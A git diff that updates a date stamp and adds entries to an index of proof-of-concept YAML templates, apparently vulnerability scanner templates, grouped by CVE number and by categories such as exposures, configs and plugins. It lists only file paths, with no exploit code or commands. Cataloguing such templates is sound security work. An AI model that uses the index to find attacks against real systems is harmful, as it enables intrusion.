diff --git a/date.txt b/date.txt index 781eeaca5b..fcb1ceaa6b 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20241218 +20241219 diff --git a/poc.txt b/poc.txt index 12d6bb54f1..7633f93c2b 100644 --- a/poc.txt +++ b/poc.txt @@ -1902,6 +1902,7 @@ ./poc/auth/about-author.yaml ./poc/auth/ac-weak-login.yaml ./poc/auth/accept-authorize-net-payments-using-contact-form-7-236bcbdbfe25f4f674ac30a10158deed.yaml +./poc/auth/accept-authorize-net-payments-using-contact-form-7.yaml ./poc/auth/access-category-password-721c6586da2abd6f25490c1a78f566dd.yaml ./poc/auth/access-category-password.yaml ./poc/auth/accredible-certificates-19877bfd228a784355caff7bdef8ce37.yaml @@ -6443,6 +6444,7 @@ ./poc/aws/amazon-docker-config-280.yaml ./poc/aws/amazon-docker-config-disclosure-278.yaml ./poc/aws/amazon-docker-config-disclosure.yaml +./poc/aws/amazon-docker-config-exposure.yaml ./poc/aws/amazon-docker-config.yaml ./poc/aws/amazon-ec2-detect.yaml ./poc/aws/amazon-ec2-ssrf.yaml @@ -7764,6 +7766,7 @@ ./poc/config/amazon-docker-config-280.yaml ./poc/config/amazon-docker-config-disclosure-278.yaml ./poc/config/amazon-docker-config-disclosure.yaml +./poc/config/amazon-docker-config-exposure.yaml ./poc/config/amazon-docker-config.yaml ./poc/config/ansible-config-disclosure-325.yaml ./poc/config/ansible-config-disclosure-326.yaml @@ -9309,6 +9312,7 @@ ./poc/cve/CVE-2012-0898-e25a6dec390cf15b0d1249b5ad5c9d6b.yaml ./poc/cve/CVE-2012-0898.yaml ./poc/cve/CVE-2012-0901-2138.yaml +./poc/cve/CVE-2012-0901-2139.yaml ./poc/cve/CVE-2012-0901-2141.yaml ./poc/cve/CVE-2012-0901-a5e592be45bff7543088d5e909ebfd19.yaml ./poc/cve/CVE-2012-0901.yaml @@ -10304,6 +10308,7 @@ ./poc/cve/CVE-2014-4543.yaml ./poc/cve/CVE-2014-4544-2359.yaml ./poc/cve/CVE-2014-4544-2360.yaml +./poc/cve/CVE-2014-4544-2362.yaml ./poc/cve/CVE-2014-4544-74b7953759bf1b1f23ebc5ba5596be18.yaml ./poc/cve/CVE-2014-4544.yaml ./poc/cve/CVE-2014-4545-fa7995388055bd6919e3852d9af8af84.yaml 
@@ -18844,6 +18849,7 @@ ./poc/cve/CVE-2021-24748.yaml ./poc/cve/CVE-2021-24749-f00fd172da2b9412763c17a6073a0824.yaml ./poc/cve/CVE-2021-24749.yaml +./poc/cve/CVE-2021-24750-5763.yaml ./poc/cve/CVE-2021-24750-5764.yaml ./poc/cve/CVE-2021-24750-8a31f4a64820c00c32222ce8ced456f1.yaml ./poc/cve/CVE-2021-24750.yaml @@ -19597,6 +19603,7 @@ ./poc/cve/CVE-2021-25109.yaml ./poc/cve/CVE-2021-25110-a5ef4cd3e6eaf436924d83f61b36f76a.yaml ./poc/cve/CVE-2021-25110.yaml +./poc/cve/CVE-2021-25111-5801.yaml ./poc/cve/CVE-2021-25111-5802.yaml ./poc/cve/CVE-2021-25111-5803.yaml ./poc/cve/CVE-2021-25111-e640acbee9a077ca1d863383eb2c8ddd.yaml @@ -20336,6 +20343,7 @@ ./poc/cve/CVE-2021-38312.yaml ./poc/cve/CVE-2021-38314-1.yaml ./poc/cve/CVE-2021-38314-2.yaml +./poc/cve/CVE-2021-38314-6300.yaml ./poc/cve/CVE-2021-38314-7f0b8207cd058c35954334945ab28be6.yaml ./poc/cve/CVE-2021-38314.yaml ./poc/cve/CVE-2021-38315-1012d4d114a54633af04ce1c040152c6.yaml @@ -20506,6 +20514,7 @@ ./poc/cve/CVE-2021-39322-262084dbc8e5d4ed4776882955e89dac.yaml ./poc/cve/CVE-2021-39322-6337.yaml ./poc/cve/CVE-2021-39322-6338.yaml +./poc/cve/CVE-2021-39322-6339.yaml ./poc/cve/CVE-2021-39322.yaml ./poc/cve/CVE-2021-39325-30b86d7c5be08dc63d78d6a517f9a0b6.yaml ./poc/cve/CVE-2021-39325.yaml @@ -37089,6 +37098,7 @@ ./poc/cve/CVE-2024-10544.yaml ./poc/cve/CVE-2024-10547-91ad0f702b882575a68f7cd6df342c13.yaml ./poc/cve/CVE-2024-10547.yaml +./poc/cve/CVE-2024-10548-c2c6f9682e36d499e8bfec31ce1d8b0c.yaml ./poc/cve/CVE-2024-1055-d648797daf2d40f2e3020df2557ea8d6.yaml ./poc/cve/CVE-2024-1055.yaml ./poc/cve/CVE-2024-10551-740e0e624799af0f29235cfe4c93224c.yaml @@ -37626,6 +37636,7 @@ ./poc/cve/CVE-2024-11252-6eb54caff749470d94f371cf65690bbc.yaml ./poc/cve/CVE-2024-11252.yaml ./poc/cve/CVE-2024-11254-0a41e95f2c7eae4094eccfb9191bc605.yaml +./poc/cve/CVE-2024-11254.yaml ./poc/cve/CVE-2024-1126-1b1f550770c7ded4c68a1b5c108b2d09.yaml ./poc/cve/CVE-2024-1126-6bafa5b3da4f53df7d3b25cb59f59ac9.yaml ./poc/cve/CVE-2024-1126.yaml 
@@ -37652,6 +37663,7 @@ ./poc/cve/CVE-2024-1129-0aba491c9fa777fb284efdb308d0b368.yaml ./poc/cve/CVE-2024-1129.yaml ./poc/cve/CVE-2024-11291-4b3df78ea45d69129dc5fbd828bf0deb.yaml +./poc/cve/CVE-2024-11291.yaml ./poc/cve/CVE-2024-11292-850b0e5aa453cf8d597f2fe778aca46b.yaml ./poc/cve/CVE-2024-11292.yaml ./poc/cve/CVE-2024-11293-445cfc68523ff32c33fa3e493bbbe08c.yaml @@ -37659,6 +37671,7 @@ ./poc/cve/CVE-2024-11294-02c448312fb9404f749dae6769ea4c77.yaml ./poc/cve/CVE-2024-11294.yaml ./poc/cve/CVE-2024-11295-a4e709d48a2b52b5c9f616e57c38968a.yaml +./poc/cve/CVE-2024-11295.yaml ./poc/cve/CVE-2024-1130-098b26182013dbcd4e8583ec0a56cb16.yaml ./poc/cve/CVE-2024-1130.yaml ./poc/cve/CVE-2024-11323-93b3a3a19c4e461d1bd3833545daae0f.yaml @@ -37702,6 +37715,7 @@ ./poc/cve/CVE-2024-11354.yaml ./poc/cve/CVE-2024-11355-edf82e64900042596ef0c5f92c74100e.yaml ./poc/cve/CVE-2024-11355.yaml +./poc/cve/CVE-2024-11356-ef26df4d3b60de17a0b2970f889bcedd.yaml ./poc/cve/CVE-2024-11359-567f69cc9128256f747073b779df1fef.yaml ./poc/cve/CVE-2024-11359.yaml ./poc/cve/CVE-2024-1136-f9f5bee6a9071adf3f3736b66c18ce7f.yaml @@ -37806,6 +37820,7 @@ ./poc/cve/CVE-2024-11438-466e48b3dc4ddb929568c36634c56fb1.yaml ./poc/cve/CVE-2024-11438.yaml ./poc/cve/CVE-2024-11439-475f578349d17c65330df618e26d04b2.yaml +./poc/cve/CVE-2024-11439.yaml ./poc/cve/CVE-2024-11440-b26a27e98ac4778bf1db64f0d89b26d0.yaml ./poc/cve/CVE-2024-11440.yaml ./poc/cve/CVE-2024-11442-30a6c47687fa6512015ca0f6c418b128.yaml 
@@ -37938,9 +37953,11 @@ ./poc/cve/CVE-2024-11730.yaml ./poc/cve/CVE-2024-11732-6300c1dae27be21acd061d5288a24196.yaml ./poc/cve/CVE-2024-11732.yaml +./poc/cve/CVE-2024-11740-0129d5469319a449ba4a4cece10b2475.yaml ./poc/cve/CVE-2024-11747-62f3cf7911a4e9abbe89a873183d1c75.yaml ./poc/cve/CVE-2024-11747.yaml ./poc/cve/CVE-2024-11748-15ab22025f25319cc075ac10ba230d57.yaml +./poc/cve/CVE-2024-11748.yaml ./poc/cve/CVE-2024-1175-59b1d28bf860d8876b76c01c1e383ade.yaml ./poc/cve/CVE-2024-1175-72fe71d31a0485cb4068281d44a8c3e9.yaml ./poc/cve/CVE-2024-1175-d6c5d59d8ac18ee4256473011fc09f08.yaml @@ -37973,6 +37990,7 @@ ./poc/cve/CVE-2024-11766.yaml ./poc/cve/CVE-2024-11767-91a6d26ebb5178e02ef1e638799045fa.yaml ./poc/cve/CVE-2024-11767.yaml +./poc/cve/CVE-2024-11768-0f86f52c54d00831befe297b09b8631b.yaml ./poc/cve/CVE-2024-11769-b830f60593d6bc500bc45458ecb55b68.yaml ./poc/cve/CVE-2024-11769.yaml ./poc/cve/CVE-2024-1177-44b068407f4a1063af5594e6bad17afb.yaml @@ -38055,6 +38073,7 @@ ./poc/cve/CVE-2024-11880-c4c58d47a5ee0ae307eff48c75fa9422.yaml ./poc/cve/CVE-2024-11880.yaml ./poc/cve/CVE-2024-11881-28951564b40a53810677e572dcba4e96.yaml +./poc/cve/CVE-2024-11881.yaml ./poc/cve/CVE-2024-11882-ea7a3f25a6986885eafd4392096ffc0e.yaml ./poc/cve/CVE-2024-11882.yaml ./poc/cve/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml @@ -38094,6 +38113,7 @@ ./poc/cve/CVE-2024-11911-faf718aed0ef166f0179212ee8a9f3c3.yaml ./poc/cve/CVE-2024-11911.yaml ./poc/cve/CVE-2024-11912-6ccaac05572b45a2acb0cf1f38c333a9.yaml +./poc/cve/CVE-2024-11912.yaml ./poc/cve/CVE-2024-11914-c373722513f4866f4994cae968afdfbb.yaml ./poc/cve/CVE-2024-11914.yaml ./poc/cve/CVE-2024-11918-095887b4ec8bd9bbd522023a03b46270.yaml 
@@ -38101,6 +38121,7 @@ ./poc/cve/CVE-2024-11925-7672d2ec8fe92df70998a26a9cf9b901.yaml ./poc/cve/CVE-2024-11925.yaml ./poc/cve/CVE-2024-11926-3eda00250e08ecc30fa30e5fb71ad416.yaml +./poc/cve/CVE-2024-11926.yaml ./poc/cve/CVE-2024-11928-a16bd2247c01bb8d43e62b3bb1620982.yaml ./poc/cve/CVE-2024-11928.yaml ./poc/cve/CVE-2024-11935-088fa6aefbb99715a7cda0aadf2f36df.yaml @@ -38126,6 +38147,7 @@ ./poc/cve/CVE-2024-12024-2503621efdf2f1cb7e290aff6361b0e6.yaml ./poc/cve/CVE-2024-12024.yaml ./poc/cve/CVE-2024-12025-4c9c64b61165ebb81c12eb54c60dfa5f.yaml +./poc/cve/CVE-2024-12025.yaml ./poc/cve/CVE-2024-12026-048d32aed4281761d7c921ef3e5b09bc.yaml ./poc/cve/CVE-2024-12026-c3675bda547bc33d41571993b615aadf.yaml ./poc/cve/CVE-2024-12026.yaml @@ -38152,6 +38174,7 @@ ./poc/cve/CVE-2024-12060-bd4215568402b7df5ccbbeef7231911e.yaml ./poc/cve/CVE-2024-12060.yaml ./poc/cve/CVE-2024-12061-b41bc216e05397f68e1c316d11d953c1.yaml +./poc/cve/CVE-2024-12061.yaml ./poc/cve/CVE-2024-12062-e6f7834c3eb1eb9aabc9534922a2b0a2.yaml ./poc/cve/CVE-2024-12062.yaml ./poc/cve/CVE-2024-1207-9fc726e35e00675f40b1bb34bea36c9b.yaml @@ -38171,6 +38194,7 @@ ./poc/cve/CVE-2024-12115-3d071505c2ef1942d31e62067bb7b342.yaml ./poc/cve/CVE-2024-12115.yaml ./poc/cve/CVE-2024-1212.yaml +./poc/cve/CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c.yaml ./poc/cve/CVE-2024-12127-90ac73f882c80998d9b42d276bfcc870.yaml ./poc/cve/CVE-2024-12127.yaml ./poc/cve/CVE-2024-12128-5b31f632a2dbc3187253dd9153d43eba.yaml @@ -38212,6 +38236,7 @@ ./poc/cve/CVE-2024-12239-a261d97e057d0344b0d272aa7d74cced.yaml ./poc/cve/CVE-2024-12239.yaml ./poc/cve/CVE-2024-12250-1ea7392f59e0ddf4978022124851bf49.yaml +./poc/cve/CVE-2024-12250.yaml ./poc/cve/CVE-2024-12253-c678eb115eb7d6bb53d9036495534285.yaml ./poc/cve/CVE-2024-12253.yaml ./poc/cve/CVE-2024-12255-bfc5cc29e7dea10995b88239c4b0d0b0.yaml 
@@ -38221,6 +38246,7 @@ ./poc/cve/CVE-2024-12258-2b0b2ebca93c2b3412aa41ef60f3638c.yaml ./poc/cve/CVE-2024-12258.yaml ./poc/cve/CVE-2024-12259-344ffbf5ed79000bc36568816138482f.yaml +./poc/cve/CVE-2024-12259.yaml ./poc/cve/CVE-2024-12260-e830e5f6450ff91a722bdd1a788fe6ed.yaml ./poc/cve/CVE-2024-12260.yaml ./poc/cve/CVE-2024-12263-fa7054e9893ee8c27ef6719a5ea1e128.yaml @@ -38234,6 +38260,7 @@ ./poc/cve/CVE-2024-12283-1957debb32749c4b64112c4a33d76ad7.yaml ./poc/cve/CVE-2024-12283.yaml ./poc/cve/CVE-2024-12287-8c4acd957f17d47a30609f0209cc76f3.yaml +./poc/cve/CVE-2024-12287.yaml ./poc/cve/CVE-2024-1229-c6d7bb9ffd8a626f74b1cf581ee631f7.yaml ./poc/cve/CVE-2024-1229.yaml ./poc/cve/CVE-2024-12293-4dd79f26a6e5d053a5956f8620a3344b.yaml @@ -38258,6 +38285,7 @@ ./poc/cve/CVE-2024-12325.yaml ./poc/cve/CVE-2024-12329-f9f82ade00c6a59a04b6f84706304098.yaml ./poc/cve/CVE-2024-12329.yaml +./poc/cve/CVE-2024-12331-1b3375d194cd3870eb15fbe759b10ed7.yaml ./poc/cve/CVE-2024-12333-7b6d410c0b3b65296f542385dba469b2.yaml ./poc/cve/CVE-2024-12333.yaml ./poc/cve/CVE-2024-12338-5605bf55e24ce1b2233083e5c7c380b3.yaml @@ -38265,6 +38293,7 @@ ./poc/cve/CVE-2024-1234-f40f3ae232b12cf9233c22ef4e6ba985.yaml ./poc/cve/CVE-2024-1234.yaml ./poc/cve/CVE-2024-12340-e574ab0a95b2364359c38e28de3f4115.yaml +./poc/cve/CVE-2024-12340.yaml ./poc/cve/CVE-2024-12341-ca294d1fd38eff7070acb6bb69bab6b0.yaml ./poc/cve/CVE-2024-12341.yaml ./poc/cve/CVE-2024-1235-21d1ea5a670d46cfb24ae9fe13a6deb9.yaml @@ -38297,6 +38326,7 @@ ./poc/cve/CVE-2024-12422-aeceb3fb45bf879d6b9a1d0dc516f06c.yaml ./poc/cve/CVE-2024-12422.yaml ./poc/cve/CVE-2024-12432-5b5915220e6a42abeb51e9b392575c63.yaml +./poc/cve/CVE-2024-12432.yaml ./poc/cve/CVE-2024-12441-1756d8f05db11c9f2310e3f212f24527.yaml ./poc/cve/CVE-2024-12441-74e5d36f1605e404ac6d859d22377c3d.yaml ./poc/cve/CVE-2024-12441.yaml 
@@ -38309,7 +38339,9 @@ ./poc/cve/CVE-2024-12448-b0024901f823c199e5df7414f136f048.yaml ./poc/cve/CVE-2024-12448.yaml ./poc/cve/CVE-2024-12449-8a82767d9800d12163c96ba6ad7adf65.yaml +./poc/cve/CVE-2024-12449.yaml ./poc/cve/CVE-2024-12454-5621596be5bd586ce99dcc404a2f85f8.yaml +./poc/cve/CVE-2024-12454.yaml ./poc/cve/CVE-2024-12458-e6b90e547e05531a7e2ba9dd1b97c927.yaml ./poc/cve/CVE-2024-12458.yaml ./poc/cve/CVE-2024-12459-1c8f2c123589ae3f3e53f13d47253fcf.yaml @@ -38325,11 +38357,13 @@ ./poc/cve/CVE-2024-12474-143276e3178f42c70ef45aed9f8f19ab.yaml ./poc/cve/CVE-2024-12474.yaml ./poc/cve/CVE-2024-12500-fda26400f9dece6114dcd6955fceb5ac.yaml +./poc/cve/CVE-2024-12500.yaml ./poc/cve/CVE-2024-12501-c27faf539f1a53d9009e9c3a53602e7a.yaml ./poc/cve/CVE-2024-12501.yaml ./poc/cve/CVE-2024-12502-1f199f73b33e699daa4c51027e49df2e.yaml ./poc/cve/CVE-2024-12502.yaml ./poc/cve/CVE-2024-12513-826c2ee2f56d5d07458720b488403657.yaml +./poc/cve/CVE-2024-12513.yaml ./poc/cve/CVE-2024-12517-efd628a1954edd29546cb9041fe9b427.yaml ./poc/cve/CVE-2024-12517.yaml ./poc/cve/CVE-2024-12523-3e0bf521f24a7f7e87f4a5a124f0141d.yaml @@ -38337,8 +38371,10 @@ ./poc/cve/CVE-2024-12526-d0175a79efc04628234f5b16874bd415.yaml ./poc/cve/CVE-2024-12526.yaml ./poc/cve/CVE-2024-12554-f7e364a88d43fcf0d377a1e86841f6a0.yaml +./poc/cve/CVE-2024-12554.yaml ./poc/cve/CVE-2024-12555-5cbce38a9099186c24f323bfe5404451.yaml ./poc/cve/CVE-2024-12555.yaml +./poc/cve/CVE-2024-12560-449215acaf31dbe73bdd1b194455c475.yaml ./poc/cve/CVE-2024-12572-99c5fc1f98bec101dce40530a6fa4801.yaml ./poc/cve/CVE-2024-12572.yaml ./poc/cve/CVE-2024-12574-411e698a90aecedc46e74ff8fd9e6336.yaml 
@@ -38350,8 +38386,10 @@ ./poc/cve/CVE-2024-12581-76cef049807f0d0c701a5c76e40729ed.yaml ./poc/cve/CVE-2024-12581.yaml ./poc/cve/CVE-2024-12596-774434bb9ea28259fa8266e81972c00f.yaml +./poc/cve/CVE-2024-12596.yaml ./poc/cve/CVE-2024-12601-b82cf7ad4580a990c2c5594b0652b203.yaml ./poc/cve/CVE-2024-12601.yaml +./poc/cve/CVE-2024-12626-300286d442729c59242e3ed40a31f2a5.yaml ./poc/cve/CVE-2024-12628-d21dcffe48f9c4b21314ab529a797a81.yaml ./poc/cve/CVE-2024-12628.yaml ./poc/cve/CVE-2024-1273-7a7d027c3b90e9a4f71fda8d00cf65ff.yaml @@ -45384,6 +45422,7 @@ ./poc/cve/CVE-2024-43232.yaml ./poc/cve/CVE-2024-43233-85f3cce0d6d07d97f0d7df696bff451c.yaml ./poc/cve/CVE-2024-43233.yaml +./poc/cve/CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa.yaml ./poc/cve/CVE-2024-43235-2154ff0380e6daad445c31c3587ca5c2.yaml ./poc/cve/CVE-2024-43235.yaml ./poc/cve/CVE-2024-43236-0aa244f387067d6fa1a2f360a122d1ca.yaml @@ -48109,6 +48148,7 @@ ./poc/cve/CVE-2024-51814-c9d1de6f4895b6765e1577177716171e.yaml ./poc/cve/CVE-2024-51814.yaml ./poc/cve/CVE-2024-51815-2050eb9a873e413f9671599898c2d828.yaml +./poc/cve/CVE-2024-51815-c1a5d2a9a6da5fe3f3b34cd3252bd9c2.yaml ./poc/cve/CVE-2024-51815.yaml ./poc/cve/CVE-2024-51816-bdee10c167d3a9876a83e9819552c55d.yaml ./poc/cve/CVE-2024-51816.yaml 
@@ -49098,6 +49138,13 @@ ./poc/cve/CVE-2024-54232.yaml ./poc/cve/CVE-2024-5424-df160c9df5b615381a764753829b3ffb.yaml ./poc/cve/CVE-2024-5424.yaml +./poc/cve/CVE-2024-54240-a2f6789a7a236589446d14d1c3f866b6.yaml +./poc/cve/CVE-2024-54240-ed4ff64a46e17d58cd08c47d78193084.yaml +./poc/cve/CVE-2024-54242-3b5086237f4638cb162a9f792453261e.yaml +./poc/cve/CVE-2024-54242-96632825cfd9f5b03b99528997824213.yaml +./poc/cve/CVE-2024-54243-87a7d63f5b8e33b647cfcc9ecc055c10.yaml +./poc/cve/CVE-2024-54244-908fba9dd40f4471beff68bece44dab3.yaml +./poc/cve/CVE-2024-54245-25b820cd545669d7785ad46d5c7b657d.yaml ./poc/cve/CVE-2024-54247-32dd452fd1db8cb528bb367644d98408.yaml ./poc/cve/CVE-2024-54247.yaml ./poc/cve/CVE-2024-5425-8573326a950aad533931811dfbdfb643.yaml @@ -49114,6 +49161,10 @@ ./poc/cve/CVE-2024-5426.yaml ./poc/cve/CVE-2024-54260-174ca9070168a4655d9261554d70d98e.yaml ./poc/cve/CVE-2024-54260.yaml +./poc/cve/CVE-2024-54261-5582920a3f8c43604a8f19f2f919fe5e.yaml +./poc/cve/CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9.yaml +./poc/cve/CVE-2024-54267-ccf671ed5cd0d4e6c19828ed0428edad.yaml +./poc/cve/CVE-2024-54268-1ee53f44eb931385f5bebe5e1a66b55d.yaml ./poc/cve/CVE-2024-5427-8e98140a73fa39518f80acb935a5af8c.yaml ./poc/cve/CVE-2024-5427.yaml ./poc/cve/CVE-2024-5429-4e4d745e7910fb2ab893ff12ad5452c1.yaml @@ -57767,6 +57818,7 @@ ./poc/cve/cve-2021-26084-8-5833.yaml ./poc/cve/cve-2021-26084-9(1).yaml ./poc/cve/cve-2021-26084-9-5834.yaml +./poc/cve/cve-2021-26084.yaml ./poc/cve/cve-2021-26085(1).yaml ./poc/cve/cve-2021-26085-5840.yaml ./poc/cve/cve-2021-26085-5841.yaml @@ -62701,6 +62753,7 @@ ./poc/docker/amazon-docker-config-280.yaml ./poc/docker/amazon-docker-config-disclosure-278.yaml ./poc/docker/amazon-docker-config-disclosure.yaml +./poc/docker/amazon-docker-config-exposure.yaml ./poc/docker/amazon-docker-config.yaml ./poc/docker/aws-ecs-container-agent-tasks-639.yaml ./poc/docker/aws-ecs-container-agent-tasks-640.yaml 
@@ -63339,6 +63392,7 @@ ./poc/exposed/allied-telesis-exposure.yaml ./poc/exposed/amazon-docker-config-disclosure-278.yaml ./poc/exposed/amazon-docker-config-disclosure.yaml +./poc/exposed/amazon-docker-config-exposure.yaml ./poc/exposed/amazon-sns-topic-disclosure-detect.yaml ./poc/exposed/ambari-exposure-291.yaml ./poc/exposed/ambari-exposure-292.yaml @@ -85330,6 +85384,7 @@ ./poc/other/age-verify.yaml ./poc/other/agency-toolkit-2b3a89533fdd22bc487facacae78c32e.yaml ./poc/other/agency-toolkit-c4d0da08ce2ccde8e115ab3f856365e3.yaml +./poc/other/agency-toolkit.yaml ./poc/other/agendapress-9d379c9201895f0b4f055dca919e584a.yaml ./poc/other/agendapress.yaml ./poc/other/agenteasy-properties-a5fa9b1dc7a85d57314efe1983687fb0.yaml @@ -85993,6 +86048,7 @@ ./poc/other/animated-typing-effect.yaml ./poc/other/animati-pacs.yaml ./poc/other/animation-addons-for-elementor-8cb2b19594b70ed1d20a65da8b6d2986.yaml +./poc/other/animation-addons-for-elementor.yaml ./poc/other/animeplanet.yaml ./poc/other/anmai-system.yaml ./poc/other/anneca-intouch-crm.yaml @@ -87685,6 +87741,7 @@ ./poc/other/bg-patriarchia-bu.yaml ./poc/other/bh-bh5000c.yaml ./poc/other/biagiotti-membership-890b34de1d7826afddfee44c27d08a72.yaml +./poc/other/biagiotti-membership.yaml ./poc/other/bib2html-d49e316b2a9fd89cfdca05b034c4f43c.yaml ./poc/other/bib2html.yaml ./poc/other/bible-text-2fb996e0b3ee50923d0955b53bdc3c30.yaml @@ -88592,6 +88649,7 @@ ./poc/other/broken-link-checker-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/broken-link-checker-plugin.yaml ./poc/other/broken-link-checker.yaml +./poc/other/broken-link-finder-4ff2e9009576af041b5a7e782318ee33.yaml ./poc/other/broken-link-finder-e63d15357b99e350a186c3e25f59b7fd.yaml ./poc/other/broken-link-finder.yaml ./poc/other/broken-link-hijacking.yaml 
@@ -89005,6 +89063,7 @@ ./poc/other/busybox-repository-browser.yaml ./poc/other/button-74c30e2d8ce2c9b5cd693f86892b1b66.yaml ./poc/other/button-block-7ecfdf192cf94acce6cac43afe49f5ac.yaml +./poc/other/button-block-ebc0f1c83e52f295da4b8e511e072df7.yaml ./poc/other/button-block.yaml ./poc/other/button-cabfe9182f2c658e08c2c822ba1d8b8a.yaml ./poc/other/button-contact-vr-00cf0dc7057886aabfaae3f4a59771ca.yaml @@ -90280,6 +90339,7 @@ ./poc/other/clientaccesspolicy.yaml ./poc/other/clientexec.yaml ./poc/other/clientmesh-malware.yaml +./poc/other/clients-41225319ecc15ac24c062330ae8b961c.yaml ./poc/other/climatejusticerocks-mastodon-instance.yaml ./poc/other/cliniccases.yaml ./poc/other/clio-grow-form-0592c21f03e73280a2c0f582bc446892.yaml @@ -90399,6 +90459,7 @@ ./poc/other/cm-ad-changer-plugin.yaml ./poc/other/cm-ad-changer.yaml ./poc/other/cm-answers-07fb2e4180c141343441b07b45399c93.yaml +./poc/other/cm-answers-b0d0c22beaaa6f4ccde4c61443cc4cce.yaml ./poc/other/cm-answers.yaml ./poc/other/cm-business-directory.yaml ./poc/other/cm-download-manager-511c70bb5a6ca82828706647b1902190.yaml @@ -90630,6 +90691,7 @@ ./poc/other/collapsing-archives-8a4859018381231c43949c3ecb04831f.yaml ./poc/other/collapsing-archives.yaml ./poc/other/collapsing-categories-b92da15653f7212a9df1f5d57bdcbceb.yaml +./poc/other/collapsing-categories.yaml ./poc/other/collectchat-525851924ba115a8276729ede6c6c5bc.yaml ./poc/other/collectchat-a5b34f7c327071ca50c7be898ec7804e.yaml ./poc/other/collectchat.yaml @@ -93016,6 +93078,7 @@ ./poc/other/dlink-850l-info-leak-7037.yaml ./poc/other/dlink-850l-info-leak-7038.yaml ./poc/other/dlink-850l-info-leak-7039.yaml +./poc/other/dlink-850l-info-leak.yaml ./poc/other/dlink-850l-info-leak.yml ./poc/other/dlink-file-read.yaml ./poc/other/dlink-panel.yaml 
@@ -93203,6 +93266,7 @@ ./poc/other/download-info-page-ef92059d5750ea701f6be76b8740b016.yaml ./poc/other/download-info-page.yaml ./poc/other/download-manager-0330cd624538acece3fa4ac438571f36.yaml +./poc/other/download-manager-0b3c1d139da969d81ea373f38d201244.yaml ./poc/other/download-manager-0fb74b91277035155e3a675be1e98d3a.yaml ./poc/other/download-manager-1554986f43029970f8e1573ffde50003.yaml ./poc/other/download-manager-1aa8218553cef955f34140e5e9f9c804.yaml @@ -93237,6 +93301,7 @@ ./poc/other/download-manager-7a87f2367670d72c84f79f9fc687ee77.yaml ./poc/other/download-manager-7ba73846a9f6de9d7ba86ac8506158d5.yaml ./poc/other/download-manager-809a875188327a8370c96a7e6d41944e.yaml +./poc/other/download-manager-81cd1d79de28b7aae9b449e5f006a9f6.yaml ./poc/other/download-manager-8489a8e154ce624124d7df744992f179.yaml ./poc/other/download-manager-853fb05a45b2bfad623063abc5c98aa0.yaml ./poc/other/download-manager-871419f24909295af5c806dc07101270.yaml @@ -94021,6 +94086,7 @@ ./poc/other/easy-watermark-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/other/easy-watermark.yaml ./poc/other/easy-waveform-player-d8187a1daf11c2f64ad81046a48d9c78.yaml +./poc/other/easy-waveform-player.yaml ./poc/other/easy-wi-installer.yaml ./poc/other/easy-zillow-reviews-d719c21b3b083cea6a66583de9da5dde.yaml ./poc/other/easy-zillow-reviews.yaml @@ -94120,6 +94186,7 @@ ./poc/other/echo-knowledge-base.yaml ./poc/other/echosign-66a67f525cbd222bf1ed230c309bd4da.yaml ./poc/other/echosign.yaml +./poc/other/echoza-e1decf47b202b8b552a71edd87b20231.yaml ./poc/other/eclipse-birt-panel.yaml ./poc/other/ecoa-building-automation-lfd-7165.yaml ./poc/other/ecoa-building-automation-lfd-7166.yaml 
@@ -96223,6 +96290,7 @@ ./poc/other/files-download-delay-08fd51fbc78181d1e34dd9d45b2727c0.yaml ./poc/other/files-download-delay.yaml ./poc/other/filester-3e7eafb6dc9ec71ae8bff5c73b01f7a4.yaml +./poc/other/filester-568e78f1e3709813a32ee8f38f2cd07a.yaml ./poc/other/filester-6c98f1dd83857c308a85341bfd6845a6.yaml ./poc/other/filester-7ed5af5d850e2fce85818f9085ee2f60.yaml ./poc/other/filester-85309abff0088958079dfa7ce1d84b20.yaml @@ -97396,6 +97464,7 @@ ./poc/other/gafgyt-hoho-malware.yaml ./poc/other/gafgyt-jackmy-malware.yaml ./poc/other/gafgyt-oh-malware.yaml +./poc/other/gaga-lite-f2a32ddf27d02f7ada6388e3c4206c80.yaml ./poc/other/galleria-2552889584e9a8b3449cfa72a8b31a3d.yaml ./poc/other/galleria.yaml ./poc/other/gallerio-606eb81fe551fe3b927eaba6df8254a6.yaml @@ -98323,6 +98392,7 @@ ./poc/other/grimag-10469289d4ce07c3ee9e6caf587a4ad6.yaml ./poc/other/grimag-17ffb26bf9cc3eba1406c5b966a9d3f3.yaml ./poc/other/grimag.yaml +./poc/other/grip-f2a32ddf27d02f7ada6388e3c4206c80.yaml ./poc/other/groovy-console-command-exec.yaml ./poc/other/groovy-console-open.yaml ./poc/other/grou-random-image-widget-1b2b3484e08cc8956371a1a2add454f7.yaml @@ -105599,6 +105669,7 @@ ./poc/other/one-page-blocks-76c6b84ccd9f6bd60eada03675ff7bce.yaml ./poc/other/one-page-blocks-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/other/one-page-blocks.yaml +./poc/other/one-paze-f2a32ddf27d02f7ada6388e3c4206c80.yaml ./poc/other/one-user-avatar-38cab75f654a2b2a6fc5d0bc2a75fde9.yaml ./poc/other/one-user-avatar-657d31ea5789105ee530267aea8bd01f.yaml ./poc/other/one-user-avatar.yaml @@ -106678,6 +106749,7 @@ ./poc/other/phastpress-6b35bbfd8685572f477ce7413f5fa351.yaml ./poc/other/phastpress.yaml ./poc/other/philantro-29c5a7b9291bcb9f2b3f30ab18228044.yaml +./poc/other/philantro.yaml ./poc/other/phlox-pro-2af4b34daae1da10d41ce9ef928d702c.yaml ./poc/other/phlox-pro.yaml ./poc/other/phocas.yaml 
